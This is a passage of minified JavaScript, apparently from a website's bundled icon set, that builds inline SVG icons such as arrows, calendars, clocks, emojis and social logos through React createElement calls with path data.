.068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,a.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 